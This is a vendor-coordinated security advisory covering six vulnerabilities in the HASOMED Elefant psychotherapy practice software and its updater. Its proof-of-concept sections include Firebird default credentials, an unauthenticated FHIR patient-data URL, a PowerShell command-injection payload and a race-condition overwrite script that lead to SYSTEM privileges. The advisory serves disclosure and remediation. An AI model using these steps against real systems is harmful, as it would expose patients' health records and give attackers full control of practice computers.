Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater

Title

Multiple Vulnerabilities

Product

HASOMED Elefant and Elefant Software Updater

Vulnerable Version

<24.04.00, Elefant Software Updater <1.4.2.1811

Fixed Version

24.04.00, Elefant Software Updater 1.4.2.1811

CVE Number

CVE-2024-50588, CVE-2024-50589, CVE-2024-50590, CVE-2024-50591, CVE-2024-50592, CVE-2024-50593

Impact

critical

Homepage

https://hasomed.de/produkte/elefant/

Found

15.04.2024

By

Tobias Niemann, Daniel Hirschberger, Florian Stuhlmann (Office Bochum) | SEC Consult Vulnerability Lab

Multiple vulnerabilities in the HASOMED Elefant medical software were identified. An unauthenticated attacker was able to connect to the database in the role of database administrator from the local network using default credentials. This allowed an attacker to read or overwrite patient data and the login data required for the Elefant software. In addition, he could connect and use an unprotected FHIR API from the local network to read patient data. In the default configuration, a local attacker without administrative privileges could use the Elefant Windows Services to escalate his rights on the local system (Local Privilege Escalation). Several vulnerabilities were also identified in the accompanying Elefant Software Updater, which an attacker could use for local privilege escalation.

Vendor description


(Translated) "Elefant is the KBV-certified practice software from HASOMED, specializing in the needs of psychological psychotherapists, child and adolescent psychotherapists and medical psychotherapists. The software is ideal for individual and group practices, private accountants, medical care centers and training institutes in the fields of behavioral therapy, psychoanalysis, depth psychology -based psychotherapy and systemic therapy."

Source: https://hasomed.de/produkte/elefant/

Business recommendation

The vendor provides a patch which should be installed immediately.

SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues.

Vulnerability overview/description

1) Unprotected Exposed Firebird Database (CVE-2024-50588)

An unauthenticated attacker with access to the local network of the medical office can use known default credentials to gain remote DBA access to the Elefant Firebird database. The data in the database includes patient data and login credentials among other sensitive data. In addition, this enables an attacker to create and overwrite arbitrary files on the server filesystem with the rights of the Firebird database ("NT AUTHORITY\SYSTEM").

2) Unprotected FHIR API (CVE-2024-50589)

An unauthenticated attacker with access to the local network of the medical office can query an unprotected Fast Healthcare Interoperability Resources (FHIR) API to get access to sensitive electronic health records (EHR).

3) Local Privilege Escalation via Weak Service Binary Permissions (CVE-2024-50590)

An attacker with local access the to medical office computer can escalate his Windows user privileges to "NT AUTHORITY\SYSTEM" by overwriting one of two Elefant service binaries with weak permissions.

4) Local Privilege Escalation via Command Injection (CVE-2024-50591)

An attacker with local access the to medical office computer can escalate his Windows user privileges to "NT AUTHORITY\SYSTEM" by exploiting a command injection vulnerability in the Elefant Update Service. The command injection can be exploited by communicating with the Elefant Update Service which is running as "SYSTEM" via Windows Named Pipes.

5) Local Privilege Escalation via Race Condition (CVE-2024-50592)

An attacker with local access the to medical office computer can escalate his Windows user privileges to "NT AUTHORITY\SYSTEM" by exploiting a race condition in the Elefant Update Service during the repair or update process.

6) Hardcoded Service Password (CVE-2024-50593)

An attacker with local access to the medical office computer can access restricted functions of the Elefant Service tool by using a hard-coded "Hotline" password. 

Proof of concept

1) Unprotected Exposed Firebird Database (CVE-2024-50588)

Elefant uses a Firebird DB to store data. The Firebird server listens on all interfaces on port 3050 (see figure 1):

Figure 1: Database server listening on all interfaces on port 3050

An attacker can connect directly to the database as DBA if he can reach port 3050 of the Elefant server using the known Firebird default credentials "SYSDBA:masterkey" and specifying the Elefant database path “C:\Elefant1\ELEFANT.gdb”, see figure 2:

Figure 2: Direct connection to the database

The database contains all Elefant data including patient data and the obfuscated Elefant login data (figure 3):

Figure 3: Database with sensitive data

To obtain the plain login credentials each byte must be xored with 0x1b. In addition an attacker can create and overwrite arbitrary files on the server filesystem with the rights of the database ("NT AUTHORITY\SYSTEM") via Firebird delta files. Depending on other running software (i.e. MS IIS) RCE can be achieved this way by uploading a webshell. The weak default credentials are hardcoded into Elefant and Elefant Service.

2) Unprotected FHIR API (CVE-2024-50589)

While the Elefant client is running it listens on port 9090 on all interfaces (figure 4):

Figure 4: Unprotected API access on port 9090

An unauthenticated FHIR API is exposed on this port. An attacker with access to port 9090 can query the API for patient and physician data among other data. The API can be queried via plain HTTP. All patient data can for example be queried by visiting the following URL:

http:// XXX.XXX.XXX.XXX:9090/Patient

The API responds with the patient data:

<?xml version="1.0"?>
<Bundle xmlns="http://hl7.org/fhir">
[...]
 <type value="searchset"/>
 <timestamp value="2024-05-08T20:38:26.859+02:00"/>
 <total value="4"/>
[...]
    <Patient>
       <id value="patient.3"/>
       <meta>
         <versionId value="1"/>
         <lastUpdated value="2024-05-31T14:42:39.685+02:00"/>
         <profile value="https://fhir.kbv.de/StructureDefinition/KBV_PR_VoS_Patient|2.1.0"/>
       </meta>
       <identifier>
         <type>
           <coding>
             <system value="http://terminology.hl7.org/CodeSystem/v2-0203"/>
             <code value="MR"/>
           </coding>
         </type>
         <system value="http://hasomed.de/Elefant/Patient"/>
         <value value="3"/>
       </identifier>
       <identifier>
         <use value="official"/>
         <type>
           <coding>
             <system value="http://fhir.de/CodeSystem/identifier-type-de-basis"/>
             <code value="PKV"/>
           </coding>
         </type>
         <system value="http://fhir.de/sid/pkv/kvid-10"/>
         <value value="aaaaa"/>
       </identifier>
       <name>
         <use value="official"/>
         <text value="Dr. POC Vorname POC Nachname"/>
         <family value="POC Nachname">
           <extension url="http://hl7.org/fhir/StructureDefinition/humanname-own-name">
             <valueString value="POC Nachname"/>
           </extension>
         </family>
         <given value="POC Vorname"/>
         <prefix value="Dr.">
           <extension url="http://hl7.org/fhir/StructureDefinition/iso21090-EN-qualifier">
             <valueCode value="AC"/>
           </extension>
         </prefix>
       </name>
       <gender value="female"/>
       <birthDate value="2018-11-07"/>
       <address>
         <type value="both"/>
         <line value="Teststr. 1">
           <extension url="http://hl7.org/fhir/StructureDefinition/iso21090-ADXP-streetName">
             <valueString value="Teststr."/>
           </extension>
           <extension url="http://hl7.org/fhir/StructureDefinition/iso21090-ADXP-houseNumber">
             <valueString value="1"/>
           </extension>
         </line>
         <city value="Bochum"/>
         <postalCode value="44801"/>
         <country value="D"/>
       </address>
     </Patient>
[...]

Similarly all practitioner information is available at:

http:// XXX.XXX.XXX.XXX:9090/Practitioner/

3) Local Privilege Escalation via Weak Service Binary Permissions (CVE-2024-50590)

The default installation directory of Elefant is "C:\Elefant1" which is writable for all users. In addition, the Elefant installer registers two Firebird database services which are running as “NT AUTHORITY\SYSTEM” (see figure 5):

Figure 5: Service binary paths

Both service binaries are user writable. This means that a local attacker can rename one of the service binaries, replace the service executable with a new executable, and then restart the system. Once the system has rebooted, the new service binary is executed as "NT AUTHORITY\SYSTEM".

4) Local Privilege Escalation via Command Injection (CVE-2024-50591)

The Elefant Software Updater (ESU) consists of two components. An ESU service which runs as "NT AUTHORITY\SYSTEM" and an ESU tray client which communicates with the service to update or repair the installation and is running with user permissions. The communication is implemented using named pipes. A crafted message of type "MessageType.SupportServiceInfos" can be sent to the local ESU service to inject commands, which are then executed as "NT AUTHORITY\SYSTEM".

The following part of the service is vulnerable against command injection, because the input is passed on without filtering (figure 6):

Figure 6: Command injection

The input is first split at ';', is then used to create a directory, and finally reaches the sink at line 30. Because the input is split at ';' and the creation of the directory must not fail before reaching the sink, only '&' can be used to inject commands here, because Windows does not allow the characters '\/:*?"<>|' in directory or filenames.  The following payload avoids the forbidden characters, ';' and dynamically constructs the path of the target script (C:\SEC\exec.ps1).

"& powershell.exe -NoExit -ep bypass powershell (Join-Path
   (Join-Path (Get-PSDrive c).root SEC)exec.ps1) #".

For this proof of concept, the ESU tray client "Info" function was modified to inject commands into the ESU service. The payload must be injected into the first parameter of "CollectServiceInfos" to successfully reach the sink in the ESU service after being sent via a named pipe:

private void OnInfo(object sender, EventArgs e)
{
    string text = "C:\\SEC\\exec.ps1";
    TrayUtils.ShowMessageBox(new MessageBoxData
    {
        Message = "MOD: Put PS Script at " + text,
        Caption = "Info",
        ButtonType = MessageBoxButtons.OK,
        IconType = MessageBoxIcon.Asterisk
    });
    this.m_TrayManager.CollectServiceInfos("& powershell.exe -NoExit -ep bypass powershell (Join-Path
   (Join-Path (Get-PSDrive c).root SEC)exec.ps1) #", "dummy.zip");
}

In this proof of concept the client injects the payload and the ESU service executes the powershell script at the user writable location C:\SEC\exec.ps1.
The content of the script is displayed below:

whoami > C:\secwashere
Figure 7: Click on "Info"
Figure 8: Popup showing

After the OK button is pressed, the command is injected and executed as “NT AUTHORITY\SYSTEM” (figure 9):

Figure 9: Executing commands as NT AUTHORITY\SYSTEM

5) Local Privilege Escalation via Race Condition (CVE-2024-50592)

Another way to escalate local privileges is to use the Elefant Software Updater "repair" function. When using the repair function, the service queries the server for a list of files and their hashes. In addition, instructions to execute binaries to finalize the repair process are included:

POST /eup/release/prod/backend/api/ReadApplicationVersion HTTP/2
Host: eup.hasomed.de
Accept: application/json
Apikey: fb[...]
Content-Type: application/json; charset=utf-8
Content-Length: 242
{"programName":"elefant"
[...]

The server responds with:

HTTP/2 200 OK
[...]
"hash":"","fileSize":0,"type":"execute","filePath":"PostESUUpdate.exe",
"parameters":"","hint":"Abschließende Schritte nach der Installation des Elefant-Updates
durch den ESU"},{"hash":"","fileSize":0,"type":"execute","filePath":"Support\\Update_OpenJava.exe"
,"parameters":"/verysilent","hint":"Aktualisierung der OpenJava-Instanz"}]}

The executables are executed as "NT AUTHORITY\SYSTEM" after they are copied over to the user writable installation folder (C:\Elefant1). This means that a user can
overwrite either "PostESUUpdate.exe" or "Update_OpenJava.exe" in the time frame after the copy and before the execution of the final repair step. The overwritten
executable is then executed as "NT AUTHORITY\SYSTEM".

The following steps can be performed to reliably execute the local privilege escalation using PostESUUpdate.exe:

  1. Delete PostESUUpdate.exe in C:\Elefant1 before starting the repair function.
  2. Start repair function in ESU
  3. Continuously check if PostESUUpdate.exe has been copied over to C:\Elefant1 yet
  4. Immediately overwrite the executable and wait for the execution as "NT AUTHORITY\SYSTEM"

The following powershell script can be used to perform steps 3 and 4:

// delete PostESUUpdate.exe before starting the update/repair
While($true)
{
If(Test-Path -path "PostESUUpdate.exe" -PathType Leaf){
Copy-Item -Force -Path "exec.exe" -Destination "PostESUUpdate.exe"
}
}

6) Hardcoded Service Password (CVE-2024-50593)

To use certain restricted functions in the Elefant Service Software it is required to enter a hotline password.

Figure 10: Hardcoded hotline password

This password is hardcoded into the Elefant Service binary, which is shipped with the software:

Figure 11: Hardcoded password shipped with the software

Vulnerable / tested versions

The following version has been tested which was the latest version available at the time of the test:

  • Elefant 24.02.02
  • Elefant Software Updater 1.2.0.33679
  • Elefant Service 05.02.00

Vendor contact timeline

2024-07-01 Contacting vendor through security@hasomed.de.
2024-07-04 First vendor response. Security contact has time off and will reply on 07-15.
2024-07-12 Security contact is back and requests the advisory.
2024-07-15 Sending advisory to vendor contact.
2024-07-18 Security contact informs us that patches for part of the issues are planned for CW32; due to vacation and regulatory issues the other issues can only be fixed after CW42, therefore they request for an extension to CW42 for the deadline; We extend the deadline to CW42;
2024-07-29 Security contact informs us that the first three fixes have been implemented in Version 24.03.03. According to the changelog, the update contains fixes for findings 1 and 6.
2024-09-04 Security contact informs us that all development is progressing as planned and the new release will be ready in CW 42.
2024-10-16 Security contact sends new release notes for version 24.04.00. According to the changelog and security contact, the update contains fixes for finding 2 and 3.
2024-10-23 Security contact informs us that the update 1.4.2.1811 of the Elefant Software Updater contains fixes for findings 4 and 5, and that adjustments for the FHIR API were made in version 24.04.00.
2024-10-28 Sending vendor latest advisory draft, informing about release on 31st October.
2024-10-30 Vendor thanks for CVE, no further feedback except first updates for the Software Updater are already available since 2024-08-21.
2024-11-05 Informing vendor about delay, postponed to 7th November.
2024-11-07 Coordinated release of advisory.

Solution

The vendor provides a patched version 24.04.00 (or higher) which can be downloaded from hasomed.de/produkte/elefant/ or via the Elefant Software Updater.

This patched version does also include fixes for the Elefant Software Updater which were shipped in version 1.4.2.1811 of the updater.

Workaround

While workarounds such as modifying the Elefant windows firewall rules and manually adjusting file permissions in the installation folder are feasible workarounds for some of the vulnerabilities, it is recommended to install the patches provided by the vendor.

Advisory URL

https://sec-consult.com/vulnerability-lab/

 

EOF Tobias Niemann, Daniel Hirschberger, Florian Stuhlmann / @2024
 

Interested to work with the experts of SEC Consult? Send us your application
Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices

Back